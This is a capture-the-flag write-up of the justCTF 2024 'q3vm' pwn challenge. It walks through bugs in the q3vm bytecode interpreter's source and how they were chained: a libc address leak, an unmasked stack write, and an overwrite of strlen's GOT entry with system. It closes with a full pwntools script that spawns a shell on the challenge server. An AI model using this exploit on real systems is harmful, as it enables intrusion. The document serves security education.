justCTF 2024
Writeup of pwn/q3vm from justCTF 2024 teaser.
overview
You want to play Quake 3 with friends. Prepare a nice game plugin!
Author: Rivit
This challenge was based off of the latest commit of q3vm, a bytecode virtual machine related to an implementation from the Quake III Arena video game. It advertises itself as a “sandbox for code you don’t fully trust,” but numerous vulnerabilities can be found that we’ll use to escape the VM and spawn a shell. The challenge’s server simply asks for a qvm bytecode file limited to 0x8000 bytes and runs it directly.
design
All logic for the interpreter is stored in the single source file vm.c. Bytecode files start with a header laying out different segments, the structure of which is shown below.
typedef struct
{
int32_t vmMagic; /**< Bytecode image shall start with VM_MAGIC */
int32_t instructionCount; /**< Number of instructions in .qvm */
int32_t codeOffset; /**< Byte offset in .qvm file of .code segment */
int32_t codeLength; /**< Bytes in code segment */
int32_t dataOffset; /**< Byte offset in .qvm file of .data segment */
int32_t dataLength; /**< Bytes in .data segment */
int32_t litLength; /**< Bytes in strings segment (after .data segment) */
int32_t bssLength; /**< How many bytes should be used for .bss segment */
} vmHeader_t;
The VM_Create
function and the VM_LoadQVM
helper function are responsible for loading the bytecode file into memory and verifying its structure. This is where we encounter the first (albeit unhelpful) bug. The data, literal, and bss sections are combined into one memory segment that we’ll simply call data. Its length is calculated as follows.
/* round up to next power of 2 so all data operations can
be mask protected */
dataLength =
header.h->dataLength + header.h->litLength + header.h->bssLength;
for (i = 0; dataLength > (1 << i); i++)
{
}
dataLength = 1 << i;
There is an integer overflow when first assigning to dataLength
, because the preceding validation (shown below) allows header.h->litLength
and header.h->dataLength
to be any positive 32 bit signed integer.
/* validate */
if (header.h->bssLength < 0 || header.h->dataLength < 0 ||
header.h->litLength < 0 || header.h->codeLength <= 0 ||
header.h->codeOffset < 0 || header.h->dataOffset < 0 ||
header.h->instructionCount <= 0 ||
header.h->bssLength > VM_MAX_BSS_LENGTH ||
header.h->codeOffset + header.h->codeLength > length ||
header.h->dataOffset + header.h->dataLength + header.h->litLength >
length)
{
Com_Printf("Warning: %s has bad header\n", vm->name);
return NULL
}
I didn’t end up utilizing this bug, but what’s important to note here is how dataLength
is a power of 2. The VM tries to implement a sandbox by bitwise ANDing all indeces into data with dataMask
, which is dataLength-1
. I presume this masking feature is why the VM only includes bounds checks in the debug build. The data segment is then allocated as follows.
/* allocate zero filled space for initialized and uninitialized data
leave some space beyond data mask so we can secure all mask operations */
vm->dataAlloc = dataLength + 4;
vm->dataBase = (uint8_t*)Com_malloc(vm->dataAlloc, vm, VM_ALLOC_DATA_SEC);
vm->dataMask = dataLength - 1;
Notice that vm->dataBase
is allocated from a single malloc
call. This is the only heap control we get. Our bytecode file is limited to 0x8000 bytes, but the bss section doesn’t expect any backing bytes in the file, so due to the VM_MAX_BSS_LENGTH
limit of 0xa00000, we can control malloc with sizes up to 2^24. The VM structure itself is stored on the stack in the main function. I’ll include its full declaration below, as it explains each component in detail.
/** Main struct (think of a kind of a main class) to keep all information of
* the virtual machine together. Has pointer to the bytecode, the stack and
* everything. Call VM_Create(...) to initialize this struct. Call VM_Free(...)
* to cleanup this struct and free the memory. */
typedef struct vm_s
{
/* DO NOT MOVE OR CHANGE THESE WITHOUT CHANGING THE VM_OFFSET_* DEFINES
USED BY THE ASM CODE (IF WE ADD THE Q3 JIT COMPILER IN THE FUTURE) */
int programStack; /**< Stack pointer into .data segment. */
/** Function pointer to callback function for native functions called by
* the bytecode. The function is identified by an integer id that
* corresponds to the bytecode function ids defined in g_syscalls.asm.
* Note however that parms equals to (-1 - function_id).
* So -1 in g_syscalls.asm equals to 0 in the systemCall parms argument,
* -2 in g_syscalls.asm equals to 1 in the systemCall parms argument,
* -3 in g_syscalls.asm equals to 2 in the systemCall parms argument
* and so on. You can convert it back to -1, -2, -3, but the 0 based
* index might help a lookup table. */
intptr_t (*systemCall)(struct vm_s* vm, intptr_t* parms);
/*------------------------------------*/
char name[VM_MAX_QPATH]; /** File name of the bytecode */
void* searchPath; /**< unused */
/* for dynamic libs (unused in Q3VM) */
void* unused_dllHandle; /**< unused */
intptr_t (*unused_entryPoint)(int callNum, ...); /**< unused */
void (*unused_destroy)(struct vm_s* self); /**< unused */
int currentlyInterpreting; /**< Is the vm currently running? */
int compiled; /**< Is a JIT active? Otherwise interpreted */
uint8_t* codeBase; /**< Bytecode code segment */
int entryOfs; /**< unused */
int codeLength; /**< Number of bytes in code segment */
intptr_t* instructionPointers;
int instructionCount; /**< Number of instructions for VM */
uint8_t* dataBase; /**< Start of .data memory segment */
int dataMask; /**< VM mask to protect access to dataBase */
int dataAlloc; /**< Number of bytes allocated for dataBase */
int stackBottom; /**< If programStack < stackBottom, error */
/*------------------------------------*/
/* DEBUG_VM */
int numSymbols; /**< Number of symbols from VM_LoadSymbols */
vmSymbol_t* symbols; /**< By VM_LoadSymbols: names for debugging */
int callLevel; /**< Counts recursive VM_Call */
int breakFunction; /**< For debugging: break at this function */
int breakCount; /**< Used for breakpoints, triggered by OP_BREAK */
/* non vanilla q3 area: */
vmErrorCode_t lastError; /**< Last known error */
} vm_t;
The most important member of the vm struct to our exploitation is programStack
. It’s an index starting at the end of dataBase
used to emulate a call stack. There are no bounds checks on it, and the OP_ENTER
instruction allows us to arbitrarily over/underflow it, but as mentioned earlier, this is mitigated by the fact that it’s masked whenever used as an index.
After VM_Create
, interpretation is initiated from main with the VM_Call
function, which sets up some arguments and calls VM_CallInterpreted
. Each instance of VM_CallInterpreted
is used to execute one function, which has its own operand stack, opStack
, that most instructions will pull their arguments from. The instructions within the function are executed sequentially until an OP_LEAVE
with a negative destination is encountered.
exploitation
We’ll first need a vulnerability that allows us to to leak addresses. Note that all instructions deal with 32 bits, and the target of our write later on will only require us to modify the lower 32 bits of an address, so the goal is to get the lower 32 bits of some libc address in our operand stack. We can then perform calculations to adjust it to any libc address, like system
. The opStack
of a function is not zeroed upon entry, and there are OP_PUSH
and OP_POP
instructions that let us adjust opStackOfs
, the index of the top of the operand stack, without modifying any of the data. This lets us use leftover addresses on the stack.
/* push and pop are only needed for discarded or bad function return
values */
goto_OP_PUSH:
opStackOfs++;
DISPATCH();
goto_OP_POP:
opStackOfs--;
DISPATCH();
Running in the nsjail Docker with gdb, I was able to find a reliable libc address in the operand stack, but I will note that the leaks I found when testing in the base Ubuntu Docker without nsjail did not end up working in nsjail locally or on remote.
The next vulnerability provides us “arbitrary” heap-relative write. As mentioned earlier, we can overflow programStack
with OP_ENTER
.
goto_OP_ENTER:
/* get size of stack frame */
v1 = r2;
programCounter += 1;
programStack -= v1;
r2
is a signed 32 bit integer we control, so we can make it negative to overflow programStack
. There are no other effects of this instruction. But surely programStack
is properly masked whenever it’s used as an index, right?
goto_OP_CALL:
/* save current program counter */
*(int*)&image[programStack] = programCounter;
/* jump to the location on the stack */
programCounter = r0;
opStackOfs--;
Well, not in OP_CALL
. Note that the value we write is not exactly arbitrary, since it has to be a valid programCounter
. And with our file size limited to 0x8000 bytes, that’s not a wide range. Also note that image
is the same as vm->dataBase
.
We can circumvent this value restriction with the feature of “system calls”.
While I’m unsure if the author intended this, these system calls will live true to their name and let us call system
with arbitrary arguments.
The next part of OP_CALL
is as follows.
if (programCounter < 0) /* system call */
{
int r;
/* save the stack to allow recursive VM entry */
vm->programStack = programStack - 4;
*(int*)&image[programStack + 4] = -1 - programCounter;
/* the vm has ints on the stack, we expect
pointers so we might have to convert it */
if (sizeof(intptr_t) != sizeof(int))
{
intptr_t argarr[MAX_VMSYSCALL_ARGS];
int* imagePtr = (int*)&image[programStack];
int i;
for (i = 0; i < (int)ARRAY_LEN(argarr); ++i)
{
argarr[i] = *(++imagePtr);
}
r = vm->systemCall(vm, argarr);
}
In the main program file, the functions memset
, printf
, and memcpy
are exposed as functions
that operate on VM arguments. The arguments are treated as indeces into vm->dataBase
, and the pointer conversion is done securely.
void* VM_ArgPtr(intptr_t vmAddr, vm_t* vm)
{
if (!vmAddr)
{
return NULL;
}
if (vm == NULL)
{
Com_Error(VM_INVALID_POINTER, "Invalid VM pointer");
return NULL;
}
return (void*)(vm->dataBase + (vmAddr & vm->dataMask));
}
The OP_CALL
instruction identifies these system calls as having negative programCounter
s.
The systemCalls
function switches on the programCounter
to the predefined functions, but for the default case, it will just print an error and return as usual.
default:
fprintf(stderr, "Bad system call: %i\n", id);
}
Notice how with the first image[programStack] = programCounter
, programCounter
will reference the current instruction and thus must be in the 0x8000 range.
When the destination programCounter
gets assigned after that, however, r0
is an opStack
argument we control. If we choose to make it negative and enter a system call, it will also write
without masking programStack
, and any negative programCounter
is viable here. This means we can write any 32 bit value, so long as its sign bit isn’t set (because programCounter
is negated in the calculation). For a libc address, that bit will
be determined by ASLR, so we have a 1 bit bruteforce.
*(int*)&image[programStack + 4] = -1 - programCounter;
Recall that this write is relative to vm->dataBase
, and vm->dataBase
is the result of a malloc call with a size we partially control. This would normally provide us with arbitrary heap write, but that’s useless here since we don’t have heap control afterwards. Past a certain chunk size, malloc will mmap chunks directly instead of taking them from the heap. Due to mmap relativity, these chunks will be at a consistent offset from libc.
TLS offset can make this not consistent, but when running in Docker, we’ll see our large chunks get mapped directly above libc.
We can now overflow programStack
to point it into the libc read-write region, and using our leaks, overwrite
the low 32 bits of some sensitive address. Luckily, this libc is partial RELRO, meaning it has writeable function pointers in its GOT. Due to the use of printf
as a “system call” with arguments we control,
we can overwrite the GOT of the optimized strlen
function used by printf
to hijack control flow with an argument. We overwrite the GOT to system
and make the “system call” with a valid data index corresponding to /bin/sh
in the data section. This will spawn us a shell.
A snippet of the main instructions in my solution as well as the full solve script are provided below.
# offset into strlen got
pl = insn(OP_ENTER, 0xffdfdf58)
# adjust top of stack to leftover libc address
for _ in range(6):
pl += insn(OP_PUSH)
# calculate offset to system and negate
pl += insn(OP_CONST, 0x1c3fe1)
pl += insn(OP_SUB)
pl += insn(OP_NEGI)
# bad system call to write system to strlen
pl += insn(OP_CALL)
pl += insn(OP_ENTER, 0x22206c)
# real printf system call with /bin/sh argument
pl += insn(OP_CONST, 0xffffffff)
pl += insn(OP_CALL)
#!/usr/bin/env python3
from pwn import *
exe = ELF("./q3vm_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
serv = "q3vm.nc.jctf.pro"
port = 1337
context.binary = exe
def conn(pl):
if args.REMOTE:
r = remote(serv, port)
r.sendlineafter(b":", str(len(pl)).encode())
r.sendafter(b":", pl)
else:
r = process("runner")
r.sendlineafter(b":", str(len(pl)).encode())
r.sendafter(b":", pl)
return r
opcodes = [
"OP_UNDEF", "OP_IGNORE", "OP_BREAK", "OP_ENTER", "OP_LEAVE",
"OP_CALL", "OP_PUSH", "OP_POP", "OP_CONST", "OP_LOCAL",
"OP_JUMP", "OP_EQ", "OP_NE", "OP_LTI", "OP_LEI",
"OP_GTI", "OP_GEI", "OP_LTU", "OP_LEU", "OP_GTU",
"OP_GEU", "OP_EQF", "OP_NEF", "OP_LTF", "OP_LEF",
"OP_GTF", "OP_GEF", "OP_LOAD1", "OP_LOAD2", "OP_LOAD4",
"OP_STORE1", "OP_STORE2", "OP_STORE4", "OP_ARG", "OP_BLOCK_COPY",
"OP_SEX8", "OP_SEX16", "OP_NEGI", "OP_ADD", "OP_SUB",
"OP_DIVI", "OP_DIVU", "OP_MODI", "OP_MODU", "OP_MULI",
"OP_MULU", "OP_BAND", "OP_BOR", "OP_BXOR", "OP_BCOM",
"OP_LSH", "OP_RSHI", "OP_RSHU", "OP_NEGF", "OP_ADDF",
"OP_SUBF", "OP_DIVF", "OP_MULF", "OP_CVIF", "OP_CVFI",
"OP_UNDEF", "OP_UNDEF", "OP_UNDEF", "OP_UNDEF",
]
globals().update({op: i for i, op in enumerate(opcodes)})
ninsn = 0
def prog(pl):
h = p32(0x12721444)
h += p32(ninsn)
h += p32(32)
h += p32(len(pl))
h += p32(32+len(pl))
h += p32(8-len(pl)%8 + 0x1000)
h += p32(0)
h += p32(0x15000)
return h + pl + p32(0x30)*8 + b"/bin/sh\x00"*(0x1000//8-4) + b"A"*(8-len(pl)%8)
def insn(op, arg=None):
global ninsn
ninsn += 1
pl = p8(op)
if arg:
if op == OP_ARG:
pl += p8(arg)
else:
pl += p32(arg)
return pl
def main():
# offset into strlen got
pl = insn(OP_ENTER, 0xffdfdf58)
# adjust top of stack to leftover libc address
for _ in range(6):
pl += insn(OP_PUSH)
# calculate offset to system and negate
pl += insn(OP_CONST, 0x1c3fe1)
pl += insn(OP_SUB)
pl += insn(OP_NEGI)
# bad system call to write value to strlen
pl += insn(OP_CALL)
pl += insn(OP_ENTER, 0x22206c)
# real printf syscall with /bin/sh argument
pl += insn(OP_CONST, 0xffffffff)
pl += insn(OP_CALL)
pl = prog(pl)
r = conn(pl)
r.interactive()
if __name__ == "__main__":
main()